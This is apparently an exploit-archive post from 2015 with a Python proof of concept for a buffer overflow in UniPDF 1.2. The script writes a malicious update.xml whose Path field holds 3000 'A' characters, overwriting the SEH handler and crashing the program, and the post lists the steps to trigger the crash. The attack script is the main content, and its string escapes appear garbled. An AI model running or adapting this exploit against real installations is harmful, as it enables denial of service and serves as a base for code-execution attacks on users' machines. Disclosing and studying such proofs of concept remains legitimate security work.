UniPDF 1.2 Buffer Overflow

Posted on 28 April 2015
# Exploit Title: UniPDF v1.2 BufferOverflow, SEH overwrite DoS PoC
# Author : Avinash Kumar Thapa "-Acid"
# Date of Testing : 25th April 2015
# Tested On : Windows XP- Service Pack 3 && Windows 7 Home Basic
# Vendor Homepage: http://unipdf.com/
# Software Link: http://unipdf.com/file/unipdf-setup.exe
# Steps to reproduce the Crash is:
# Step 1: Run the POC
# Step 2: Go to local Disk C:Program FilesUniPDF and copy the POC there
# Step 3 : Run the UniPdf.exe

buff2 = "x41" * 3000
crash = " <config>
"
crash += " <UserDefine>
"
crash += "<Language ID="0" />
"
crash += "<Path PathSet=""+buff2+"" Path="" />
"
crash += "<ImageFormat set="2" />
"
crash += "<Res set="96" />
"
crash += "<bit set="24" />
"
crash += "<Prefix set="" />
"
crash += "<Doc set="1" />
"
crash += "<Help set="1" />
"
crash += "</UserDefine>
"
crash += "</config>
"

print "POC Created By -Acid"
print " acid.exploit@gmail.com"
file = open("update.xml","w")
file.write(crash)
file.close()
TOP
Malware :

Last 20
Exploits :

Last 20